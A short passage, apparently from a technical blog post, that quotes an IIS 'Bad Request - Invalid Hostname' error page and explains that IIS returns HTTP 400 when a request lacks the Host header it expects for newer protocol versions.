"-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=usascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML> We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
Read more
  • 0
  • 0
  • 4264